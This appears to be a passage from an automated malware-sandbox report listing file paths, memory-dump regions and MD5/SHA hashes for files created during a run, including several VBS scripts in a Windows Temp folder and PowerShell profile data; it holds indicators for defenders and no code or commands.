SHA1 7393835a2476ae655916e0a9687eeaba3ee876e9
SHA256 eb70c64ae99d14ac2588b7a84854fbf3c420532d7fe4dfd49c7b5a70c869943a
SHA512 63bcbfcf8e7421c66855c487c31b2991a989bdea0c1edd4c40066b52fa3eb3d9d37db1cd21b8eb4f33dd5870cc20532c8f485eab9c0b4f6b0793a35c077f2d6f

memory/964-433-0x000000001B870000-0x000000001B882000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8220c01eca52a2bdab8e95d8485a7f97
SHA1 a9fc35edb35e1b2920b4048e4b615ffb24bd16a2
SHA256 6272b9448570434cd868d8ecd66e62446240de038974c15ef8b9ff230da1059d
SHA512 b9893184f10eeb9919a93c09513e2d778e111d04262ed3b1ae39dc8a2a77b59782e1dc6c6ea153d25ff4973c83a40fccc597f5f408e37e4349b3e897877926bb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 36c0eb4cc9fdffc5d2d368d7231ad514
SHA1 ce52fda315ce5c60a0af506f87edb0c2b3fdebcc
SHA256 f6efe796606c4be6422dfd070d8c8e1bcda5852520633e3ef071541ff29f359b
SHA512 4ad7de3b286152386c4cfecb07d004d9ee3976c4e397d6a13b1ddee6524c4cb78b1c4bc9c2f984f321082f6ed6da2a2cd93f9954fd378b46f24fbf19bd15fb54

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 65a68df1062af34622552c4f644a5708
SHA1 6f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256 718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA512 4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3e242d3c4b39d344f66c494424020c61
SHA1 194e596f33d54482e7880e91dc05e0d247a46399
SHA256 f688037cb0c9f9c97b3b906a6c0636c91ad1864564feb17bba4973cde361172e
SHA512 27c1cd6d72554fdce3b960458a1a6bd3f740aa7c22a313a80b043db283a224bf390648b9e59e6bdbf48020d082d728fbde569bee4ee2a610f21d659a7b3dfa02

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 be95052f298019b83e11336567f385fc
SHA1 556e6abda268afaeeec5e1ee65adc01660b70534
SHA256 ebc004fe961bed86adc4025cdbe3349699a5a1fc328cc3a37f3ff055e7e82027
SHA512 233df172f37f85d34448901057ff19f20792d6e139579a1235165d5f6056a2075c19c85bc9115a6bb74c9c949aebd7bb5391e2ae9f7b1af69e5c4aca3a48cff5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4d7e01f2da5faf06203d0bdcf32f2aee
SHA1 972128bc0896422301531607773f6af989535547
SHA256 57df11f5726f22f6b65380a63c6ddeeced49bd543781cf05428932500c6e2cef
SHA512 2d446d1ed39875581a11fc433c9fd13c7b5ad4133c50f93cfc18e355339c1dd8937058864250c9e3d659049f4feb8cf8e1ce3fd90716eb5c9b8cd309b9ccc16d

C:\Users\Admin\AppData\Local\Temp\51c82dce-5312-4145-b6d5-a694049ccbb8.vbs

MD5 c652fe464282dffd05bb658b768c1c50
SHA1 d1e30a0c4b11bc909d6cdcc07f65cfc0c1389edd
SHA256 01f2dfbd7c46398e82d2d4674b2dbb644c3f46bbcaf39e56a374b0695e9d1930
SHA512 38a3954ffdd79d8ed34201db2a19f4777adfdaf7ab4bdaeb32eb0b2c05fddddc1f27ba99f1e9fea4842e7cc1487c470e2150e1ca410eb57a9fc3c324f9e9d100

C:\Users\Admin\AppData\Local\Temp\f35d6936-9a7b-40ae-b481-da287ac57f8b.vbs

MD5 689266009311fc966895383347a45ceb
SHA1 4b5df90346066b983f4c180e920e726534daabd6
SHA256 e9a66b5ff7e323e45476350f2dc5149d02243d9568c8383cc4ef4ddf0dd0f865
SHA512 effca4b4787e16cced90a422ae88c4d6b5f1f35f28e8757c6434dd567a7a859027d46d5105e024fecb1fbb0453115c5af189860521e52b1699e1959a37351207

memory/964-477-0x000000001CD30000-0x000000001CE32000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SppExtComObj.exe.log

MD5 4a667f150a4d1d02f53a9f24d89d53d1
SHA1 306e125c9edce66f28fdb63e6c4ca5c9ad6e8c97
SHA256 414659decfd237dde09625a49811e03b5b30ee06ee2ee97ea8bcfac394d281fd
SHA512 4edd8e73ce03488a6d92750a782cd4042fbb54a5b3f8d8ba3ea227fda0653c2cd84f0c5d64976c7cdc1f518a2fdc8ff10e2a015ec7acf3cd01b0d62bc98542d8

memory/5784-480-0x0000000002AB0000-0x0000000002AC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ce590d51-0cb2-44dc-8e65-121e8153d484.vbs

MD5 0d169f9bb0aff6d99ec9eebdec709bfc
SHA1 406450b698341f66c531c26fde3331023d5009ea
SHA256 597275e2ade08cbae6ca7dbbe48dcadd0f0d09a02401309e4e91e12fe85df97f
SHA512 39f133895d56476a480b9a4a1ac3c53c4beee51906db83d25ada21e08677727754ee383373386d79ee421943523377d85c746cd9b8fc5a8aa58ef48ad8e82f53

memory/1820-507-0x00000000032E0000-0x00000000032F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\148a01bf-bd23-4ec9-9c42-b1618ecd5007.vbs

MD5 3c68cf171484f2e02153f0f85474f594
SHA1 804364ffe7cab1cbe575bd35cd2419023e7f7176
SHA256 69dd882463cf3396e02fca07ccd8c2610e27b6ea515f517806b566d521159963
SHA512 5d18bcf8d1b2a90d731565ba2b93ea19b72da4092aabe3c8da8dc5bc0ba1304df2a3a5f1c8047e6953fcbae50d64fadeb9566360c125f0e45c1146a604bcf815

C:\Users\Admin\AppData\Local\Temp\f723110b-7234-47ef-b0d7-4c1089c6d9e6.vbs

MD5 683f8bb565d3135f478669229b142663
SHA1 20ad319cefe5567514c922e771b0db9c885d6fe7
SHA256 b09defdac30ce21b1b06d98e57595ed69d55c54b79135c65c8f4d9d56bc265e5
SHA512 31571158178e7567a56c1b3a16c26100b9acc5adea1ce1be789bba5184141422e9a16c951daa066308a9ae2c0a6a6f0b301b063e5a804dd568f1e76808f7dbbf

memory/2564-560-0x000000001B960000-0x000000001B972000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f0827014-d545-4ea1-992f-a56136e1993a.vbs

MD5 fbe2834ae93dd806f0a62679a4170c9f
SHA1 4da65b856bec741e4dcf8c91d93e2b6c41a93169
SHA256 c1581a76477b322000faf923068509bff87fe55d82e002c8fb24c7cce96dda0b
SHA512 3dc33406da28612499a1d4d5b12a30cb12e1ec4c45df9b71b15f9eef5d1082c67b2f5f45ed409b21d194c5ff93d63f8f415a30764315a6ae39eeb34de4374ce3

memory/2564-579-0x000000001CEC0000-0x000000001CFC2000-memory.dmp

memory/5696-596-0x000000001CB70000-0x000000001CC72000-memory.dmp

memory/6140-617-0x000000001C870000-0x000000001C972000-memory.dmp

memory/1388-634-0x000000001C2B0000-0x000000001C3B2000-memory.dmp

memory/2064-651-0x000000001D560000-0x000000001D662000-memory.dmp

memory/4384-668-0x000000001BD10000-0x000000001BE12000-memory.dmp